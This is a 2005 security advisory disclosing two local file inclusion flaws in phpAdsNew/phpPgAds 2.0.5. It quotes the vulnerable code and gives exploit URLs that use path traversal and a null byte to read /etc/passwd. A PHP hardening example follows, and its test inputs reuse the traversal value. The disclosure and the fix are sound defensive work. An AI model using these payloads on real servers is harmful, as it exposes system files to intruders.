`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpAdsNew/phpPgAds 2.0.5 Local file inclusion cXIb8O3.16]
Author: Maksymilian Arciemowicz (cXIb8O3)
from SECURITYREASON.COM TEAM
Date: 14.07.2005 (01:54 GMT+01.00)
- --- 0. Description ---
phpAdsNew is an open-source ad server, with an integrated banner management interface and tracking system for gathering statistics. With phpAdsNew you can easily rotate paid banners and your own in-house advertisements. You can even integrate banners from third party advertising companies.
- --- 1. Local file inclusion ---
Two bugs exist in phpAdsNew and phpPgAds 2.0.5. The first bug is in adlayer.php.
Code:
- -151-153---
phpAds_registerGlobal ('what', 'clientid', 'clientID', 'context',
'target', 'source', 'withtext', 'withText',
'layerstyle');
- -151-153---
and
- -178-182---
if (!isset($layerstyle) || empty($layerstyle)) $layerstyle = 'geocities';
// Include layerstyle
require(phpAds_path.'/libraries/layerstyles/'.$layerstyle.'/layerstyle.inc.php');
- -178-182---
The variable $layerstyle isn't filtered, so you can try to include a local file.
For example, this request triggers an error:
http://[HOST]/[DIR]/adlayer.php?layerstyle=securityreason.com
and you will see an error like this:
- ---
<br />
<b>Warning</b>: main(): Unable to access ./libraries/layerstyles/securityreason.com/layerstyle.inc.php in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
<br />
<b>Warning</b>: main(./libraries/layerstyles/securityreason.com/layerstyle.inc.php): failed to open stream: No such file or directory in <b>/www/phpadsnew-2.0.5/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
<br />
<b>Fatal error</b>: main(): Failed opening required './libraries/layerstyles/securityreason.com/layerstyle.inc.php' (include_path='.:') in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
- ---
Exploit:
http://[HOST]/[DIR]/adlayer.php?layerstyle=../../../../../../../etc/passwd%00
Magic_quotes must be Off (when it is on, the %00 null byte is escaped and the path is not truncated).
The next problem exists in ./admin/js-form.php
Code:
- -26-28---
@include (phpAds_path.'/language/english/default.lang.php');
if ($HTTP_GET_VARS['language'] != 'english' && file_exists(phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php'))
@include (phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php');
- -26-28---
If magic_quotes_gpc = Off, the attack is possible.
Exploit:
http://[HOST]/[DIR]/admin/js-form.php?language=../../../../../../../../../../etc/passwd%00
Here you will not see any error, because file_exists() is called first and the include only runs if it succeeds.
- --- 3. How to fix ---
Download the new version of the script.
- --- 4. Greets ---
sp3x
- --- 5. Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com
WWW: http://securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (FreeBSD)
iD8DBQFC23pYznmvyJCR4zQRAnKUAJ9oc6khDtnehufyXWMZQK1i5AFnJgCgmUjC
hROFCdP7k+/pi1dS9SJjCOw=
=yRLH
-----END PGP SIGNATURE-----
`
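Both include sites quoted in the advisory build a filesystem path directly from a request parameter (`layerstyle` in adlayer.php, `language` in admin/js-form.php). The following is an added example, not the project's patch and not code from the advisory, showing one way to constrain such a value to a single directory name under a fixed base. The helper name `safe_component_path`, the temporary directory layout and the sample values are constructed for illustration, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example: hardened lookup for the dynamic includes quoted in the advisory.
// safe_component_path() and the throwaway directory tree are hypothetical.

/**
 * Resolve "$baseDir/$name/$file" only if $name is a single plain directory
 * name located directly under $baseDir. Returns the absolute path, or null
 * when the request must be rejected.
 */
function safe_component_path(string $baseDir, $name, string $file): ?string
{
    // 1. Syntax allowlist: rejects "/", "\", "..", dots and decoded NUL bytes.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    // 2. Canonicalise, then confirm the result is still inside $baseDir
    //    (covers symlinks planted under the base directory).
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '/' . $file);
    if ($base === false || $path === false) {
        return null;
    }
    $inside = strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
    return $inside ? $path : null;
}

// Constructed layout standing in for phpAds_path.'/libraries/layerstyles'.
$root = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
@mkdir($root . '/layerstyles/geocities', 0700, true);
file_put_contents($root . '/layerstyles/geocities/layerstyle.inc.php', "<?php\n");

$samples = [
    'geocities',                          // legitimate style
    'securityreason.com',                 // the advisory's error probe
    "../../../../../../../etc/passwd\0",  // traversal value after %00 is URL-decoded
    ['array'],                            // layerstyle[]=x arrives as an array
];
foreach ($samples as $value) {
    $path = safe_component_path($root . '/layerstyles', $value, 'layerstyle.inc.php');
    printf("%-50s %s\n", json_encode($value), $path === null ? 'REJECTED' : 'accepted');
}

// Remove the constructed tree again.
unlink($root . '/layerstyles/geocities/layerstyle.inc.php');
foreach (['/layerstyles/geocities', '/layerstyles', ''] as $d) { rmdir($root . $d); }
```

At a call site, a null result would fall back to the default ('geocities' or 'english') rather than reaching require or include.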